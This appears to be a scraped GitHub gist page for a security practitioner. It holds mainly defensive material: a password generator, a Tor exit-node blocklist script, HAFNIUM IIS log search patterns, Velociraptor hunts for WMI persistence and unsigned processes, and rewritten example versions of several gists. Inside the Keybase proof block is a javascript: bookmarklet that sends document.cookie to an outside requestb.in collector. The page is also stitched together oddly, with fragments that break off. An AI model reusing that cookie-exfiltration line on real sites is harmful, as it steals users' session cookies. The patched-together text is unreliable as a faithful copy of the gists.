Eric Capuano ecapuano
Keybase proof

I hereby claim:

  • I am ecapuano on github.
  • I am ecapuano (https://keybase.io/ecapuano) on keybase.
  • I have a public key whose fingerprint is 2033 7875 F286 D318 5746 A2A7 27D2 E47B 52A3 720B

To claim this, I am signing this object:

javascript:var img = document.createElement('img');
img.src = "http://requestb.in/zngmupzn?cookie=" + document.cookie;
@ecapuano
ecapuano / random.sh
Created May 16, 2016 02:25
Generate N random
# character set to use for generating passwords
chars='abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%'
# how many passwords to generate
count=100
n=0
while [ $n -lt $count ] ; do   # -lt gives exactly $count passwords (-le produced one extra)
for i in {1..12} ; do #### 12 is the password length
    # loop body and closing 'done's below are reconstructed (the listing is cut off here);
    # $RANDOM is not a CSPRNG, so for real secrets draw from /dev/urandom instead
    printf '%s' "${chars:RANDOM%${#chars}:1}"
done
echo
n=$((n+1))
done
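The same generator built on /dev/urandom instead of bash's $RANDOM, as an added example (not the gist's code). $RANDOM is a 15-bit PRNG with a guessable seed, fine for test data but not for secrets. The character set is the gist's; the function names (gen_password, generate_many, entropy_bits, only_allowed) and the entropy arithmetic are ours.

```sh
#!/bin/sh
# Added example, not the gist's code: draw password characters from /dev/urandom rather
# than bash's $RANDOM. The character set is the gist's; function names are ours.
chars='abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%'

# gen_password LEN : one password of exactly LEN characters from $chars.
# tr -dc discards every byte outside the set (rejection sampling, so the kept bytes
# stay uniform over the set); head -c stops after LEN kept bytes.
gen_password() {
    len=${1:-12}
    LC_ALL=C tr -dc "$chars" </dev/urandom | head -c "$len"
    echo
}

# generate_many COUNT LEN : the gist's outer loop, one password per line
generate_many() {
    i=0
    while [ "$i" -lt "${1:-100}" ]; do
        gen_password "${2:-12}"
        i=$((i + 1))
    done
}

# entropy_bits LEN : floor(LEN * log2(|chars|)), to size LEN for a target strength;
# 66 symbols give ~6.04 bits each, so 12 characters is ~72 bits, 16 is ~96.
entropy_bits() {
    awk -v n="${#chars}" -v l="${1:-12}" 'BEGIN { printf "%d\n", int(l * log(n) / log(2)) }'
}

# only_allowed PW : succeed only if every character of PW is in $chars (self-check)
only_allowed() {
    [ -z "$(printf '%s' "$1" | LC_ALL=C tr -d "$chars")" ]
}
```

Usage: `generate_many 100 12` reproduces the gist's output; `entropy_bits 12` tells you what that length is actually worth against offline guessing.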
@ecapuano
ecapuano / getTORnodes.sh
Created August 25, 2015 17:44
Simple script for getting the latest list of Tor exit nodes and outputting them in a blocklist format, one exit node per line. Easily used as a Dynamic Blocklist on Palo Alto firewalls.
#!/bin/bash
#
# Use 'crontab -e' to create a scheduled job for this. Every 6 hours or so should be good.
# Make sure your blocking software/hardware can access the tor_nodes.txt file via HTTP / FTP / SCP / etc...
#
# Write to a temp file and only replace the served list when the fetch returned data, so a
# failed download (curl -f fails on HTTP errors) never publishes an empty list that silently unblocks every exit node.
set -euo pipefail
out=/var/www/html/blocklists/tor_nodes.txt
tmp=$(mktemp "$out.XXXXXX")
curl -fsS https://check.torproject.org/exit-addresses | grep ExitAddress | cut -d' ' -f2 > "$tmp"
if [ -s "$tmp" ]; then mv "$tmp" "$out"; else rm -f "$tmp"; exit 1; fi
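The same pipeline made testable offline, as an added example (not the gist's code): it parses the exit-addresses record format, keeps only well-formed IPv4 addresses, and replaces the published file only when the new list is non-empty. SAMPLE_FEED is constructed (fake fingerprints, RFC 5737 addresses) in the feed's record layout; parse_exit_addresses, publish_blocklist and fetch_and_publish are our names.

```sh
#!/bin/sh
# Added example, not the gist's code. SAMPLE_FEED is constructed in the layout of
# https://check.torproject.org/exit-addresses (fake fingerprints, RFC 5737 addresses).
SAMPLE_FEED='ExitNode AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Published 2015-08-25 10:00:00
LastStatus 2015-08-25 11:00:00
ExitAddress 192.0.2.10 2015-08-25 11:00:00
ExitAddress 192.0.2.10 2015-08-25 10:30:00
ExitNode BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Published 2015-08-25 09:30:00
LastStatus 2015-08-25 11:00:00
ExitAddress 198.51.100.7 2015-08-25 11:00:00
ExitAddress 198.51.100.8 2015-08-25 11:00:00
ExitAddress 999.51.100.9 2015-08-25 11:00:00
ExitAddress not-an-ip 2015-08-25 11:00:00'

# parse_exit_addresses : stdin = feed, stdout = one unique, valid IPv4 per line.
# The gist's grep|cut trusts whatever follows "ExitAddress"; this rejects junk so a
# malformed or tampered feed cannot push garbage into the firewall's list.
parse_exit_addresses() {
    awk '$1 == "ExitAddress" && $2 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ {
            split($2, o, ".")
            ok = 1
            for (i = 1; i <= 4; i++) if (o[i] + 0 > 255) ok = 0
            if (ok) print $2
        }' | sort -u
}

# publish_blocklist OUT : stdin = feed; write the parsed list to OUT atomically
# (temp file + mv) and print the line count. Returns 1 and leaves OUT untouched
# when nothing valid was parsed, so a bad fetch never empties the blocklist.
publish_blocklist() {
    out=$1
    tmp="$out.tmp.$$"
    parse_exit_addresses >"$tmp"
    if [ -s "$tmp" ]; then
        mv "$tmp" "$out"
        wc -l <"$out" | tr -d ' '
    else
        rm -f "$tmp"
        return 1
    fi
}

# fetch_and_publish OUT : the cron job body. -f makes curl fail on HTTP errors instead
# of passing an error page down the pipe; -sS stays quiet except for real errors.
fetch_and_publish() {
    curl -fsS https://check.torproject.org/exit-addresses | publish_blocklist "$1"
}
```

Usage from cron: `fetch_and_publish /var/www/html/blocklists/tor_nodes.txt`; a non-zero exit means the previous list was kept, which is the safe failure mode for a blocklist.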
@ecapuano
ecapuano / winlogontypes.csv
Created June 11, 2018 23:59
Lookup CSV for WinLogBeat decorations in Graylog
id,description
2,"Interactive (logon at keyboard and screen of system)"
3,"Network (i.e. connection to shared folder on this computer from elsewhere on network)"
4,"Batch (i.e. scheduled task)"
5,"Service (service startup)"
7,"Unlock (i.e. unlocking unattended workstation)"
8,"NetworkCleartext (logon with credentials sent in clear text)"
9,"NewCredentials (i.e. RunAs or mapping a network drive with alternate credentials)"
10,"RemoteInteractive (Terminal Services, Remote Desktop or Remote Assistance)"
11,"CachedInteractive (logon with cached domain credentials)"
@ecapuano
ecapuano / gist:13386852fb80beac4561f2bed569095e
Created March 7, 2021 04:00
HAFNIUM IIS Log Search Patterns
# Quick tip to find super common artifacts of the HAFNIUM Exchange attacks with nothing more than IIS logs...
# Run this grep pattern against all logs in C:\inetpub\logs\LogFiles\W3SVC1
#
# https://twitter.com/eric_capuano
#
# What the pattern matches: a POST into /aspnet_client/ (where the web shells were written),
# an 8-character .aspx under system_web/, or a request for /ecp/y.js, followed later on the
# line by a 2xx sc-status and its sc-substatus, i.e. the request succeeded.
# Quick check for likely successful attacks
## Bash (faster) -- 'egrep' is deprecated, 'grep -E' is the same thing
grep -Ei '((POST.*/aspnet_client/)|(system_web/[A-Za-z0-9]{8}\.aspx|/ecp/y\.js)).*2[0-9]{2}\s[0-9]+' *.log
## PowerShell
Select-String -Pattern '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log
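The gist's pattern run over a few constructed IIS W3C log lines, as an added example (not the gist's code), to show what it flags and what it deliberately skips: a POST into /aspnet_client/ that got a 404 is not reported because the trailing 2xx check fails. SAMPLE_LOG is made up (RFC 5737 client addresses) in the default IIS W3C field order; hafnium_hits and hafnium_sources are our names, and `\s` is written as `[[:space:]]` so the pattern also works with non-GNU grep.

```sh
#!/bin/sh
# Added example, not the gist's code. SAMPLE_LOG is constructed in the default IIS W3C
# layout; only the #Fields line documents the column order used below.
SAMPLE_LOG='#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-03-03 04:12:33 10.0.0.5 POST /aspnet_client/system_web/abcd1234.aspx - 443 - 203.0.113.7 python-requests/2.25.1 - 200 0 0 123
2021-03-03 04:13:01 10.0.0.5 GET /ecp/y.js - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 45
2021-03-03 04:14:10 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 198.51.100.20 Mozilla/5.0 - 200 0 0 30
2021-03-03 04:15:00 10.0.0.5 POST /aspnet_client/system_web/deadbeef.aspx - 443 - 203.0.113.7 python-requests/2.25.1 - 404 0 2 10'

# The gist's regex, with the '/' escapes dropped (they are not needed in ERE) and \s
# spelled portably. The tail requires a 2xx status followed by a sub-status number.
PATTERN='((POST.*/aspnet_client/)|(system_web/[A-Za-z0-9]{8}\.aspx|/ecp/y\.js)).*2[0-9]{2}[[:space:]][0-9]+'

# hafnium_hits : stdin = IIS log lines, stdout = the lines that match (case-insensitive
# like the gist's egrep -i). Usage on a real box: cat *.log | hafnium_hits
hafnium_hits() {
    grep -Ei "$PATTERN"
}

# hafnium_sources : distinct client IPs (c-ip, field 9 in the default layout) behind
# the hits with a count each, most active first, to pivot into firewall/proxy logs.
# If your IIS site logs a different field set, adjust the $9 accordingly.
hafnium_sources() {
    hafnium_hits | awk '{ print $9 }' | sort | uniq -c | sort -rn | awk '{ print $2, $1 }'
}
```

The 404 line is the useful negative case: the same tooling probing for a shell that was not there is not "likely successful", which is exactly what the 2xx tail in the gist's pattern is for.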
@ecapuano
ecapuano / wmi_event_consumer_stacking.txt
Last active May 26, 2022 01:42
wmi_event_consumer_stacking
// run against results from Windows.Persistence.PermanentWMIEvents
// https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/Persistence/PermanentWMIEvents.yaml
SELECT ConsumerDetails.Name AS ConsumerName,
       ConsumerDetails.CommandLineTemplate AS CommandLineTemplate,
       FilterDetails.Name AS FilterName,
       FilterDetails.Query AS FilterQuery,
       count() AS Count
FROM source()
// filter common FPs (OS/vendor consumers present on every host; verify each in your own fleet before trusting the allowlist)
WHERE ConsumerName != "BVTConsumer"
AND ConsumerName != "SCM Event Log Consumer"
AND ConsumerName != "DellCommandPowerManagerAlertEventConsumer"
AND ConsumerName != "DellCommandPowerManagerPolicyChangeEventConsumer"
AND ConsumerName != "CmdLineConsumer_WSCEAA"
// the listing is cut off above; GROUP BY/ORDER BY added here so count() actually stacks identical consumer/filter pairs, rarest first
GROUP BY ConsumerName, CommandLineTemplate, FilterName, FilterQuery
ORDER BY Count
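The same stacking done in the shell over a delimited export of the hunt results, as an added example (not the gist's VQL), for when the output is a file rather than a Velociraptor notebook. SAMPLE_ROWS is constructed; ALLOWLIST carries the consumer names the gist filters; stack_wmi is our name. Rows are counted whole (consumer, command template, filter name, filter query), so a consumer that reuses a benign name but a different command line still stacks separately.

```sh
#!/bin/sh
# Added example, not the gist's code. SAMPLE_ROWS is a constructed '|'-delimited export
# of Windows.Persistence.PermanentWMIEvents rows (4 columns, header first).
SAMPLE_ROWS='ConsumerName|CommandLineTemplate|FilterName|FilterQuery
SCM Event Log Consumer|-|SCM Event Log Filter|select * from MSFT_SCMEventLogEvent
SCM Event Log Consumer|-|SCM Event Log Filter|select * from MSFT_SCMEventLogEvent
SCM Event Log Consumer|-|SCM Event Log Filter|select * from MSFT_SCMEventLogEvent
BVTConsumer|cscript KernCap.vbs|BVTFilter|SELECT * FROM __InstanceModificationEvent WITHIN 60
Updater|powershell -nop -w hidden -enc AAAA|UpdFilter|SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_PerfFormattedData_PerfOS_System"
Updater|powershell -nop -w hidden -enc AAAA|UpdFilter|SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_PerfFormattedData_PerfOS_System"
HealthCheck|wscript.exe C:\ProgramData\hc.vbs|HCFilter|SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA "Win32_LogonSession"'

# Consumer names the gist excludes as common false positives, one per line.
ALLOWLIST='BVTConsumer
SCM Event Log Consumer
DellCommandPowerManagerAlertEventConsumer
DellCommandPowerManagerPolicyChangeEventConsumer
CmdLineConsumer_WSCEAA'

# stack_wmi : stdin = export, stdout = "count|ConsumerName|CommandLineTemplate|FilterName|FilterQuery"
# for every non-allowlisted row, lowest count first so the one-offs surface at the top.
stack_wmi() {
    awk -F'|' -v allow="$ALLOWLIST" '
        BEGIN { n = split(allow, a, "\n"); for (i = 1; i <= n; i++) if (a[i] != "") skip[a[i]] = 1 }
        NR == 1 { next }                 # header row
        !($1 in skip) { count[$0]++ }    # stack on the whole row, not just the consumer name
        END { for (k in count) print count[k] "|" k }
    ' | sort -t'|' -k1,1n
}
```

Usage: `stack_wmi < wmi_events.txt | head`. Anything with a count of 1 on a fleet of hundreds of hosts deserves a look at its CommandLineTemplate before anything else.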
@ecapuano
ecapuano / gist:fc0cde0e9293bff8b01783cf8666d214
Created June 1, 2022 00:23
Velociraptor Unsigned Processes w/VT Lookups
// Run against hunt results from Windows.System.Pslist
// Note: returns ONLY processes whose signature is not verified as trusted (unsigned or
// untrusted), which keeps the number of VT API calls down; LIMIT 50 caps them further
// Uses the server side enrichment artifact 'Artifact.Server.Enrichment.Virustotal' from @therealwlambert
// Replace $apikey with your VirusTotal API key
LET VTKey <= "$apikey"
LET Results = SELECT Pid, Ppid, TokenIsElevated, Name, CommandLine, Exe,
                     Hash.SHA256 AS SHA256, Authenticode, Username
              FROM source()
              WHERE NOT Authenticode.Trusted = "trusted" // anything not verified as signed
              // processes with no Exe (e.g. System) have no hash and would be looked up with an empty value; add AND SHA256 to skip them
              LIMIT 50
SELECT *, {
    SELECT * FROM Artifact.Server.Enrichment.Virustotal(VirustotalKey=VTKey, Hash=SHA256)
} AS VTResults
FROM foreach(row=Results)
name: Custom.CapsSysmon.Deploy
description: |
  A quick and dirty way to download and install sysmon via Velociraptor
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT
type: CLIENT
parameters:
  - name: sysmonURL
    # placeholder URL: serve the binary over HTTPS from a host you control and check its
    # hash before executing it, since whatever is fetched runs on every targeted endpoint
    default: http://url.to/sysmon8_64.exe
  - name: binPath
    default: C:\sysmon.exe
# A script that will safely remove adversary footholds on systems.
#
# Be sure to replace your observables down below. Be careful not to
# include LOLBINs as they cannot be safely killed this way. Use
# Kill-Threads.ps1 for those.
#
# Used with great success during CF20
#
# Author: Eric Capuano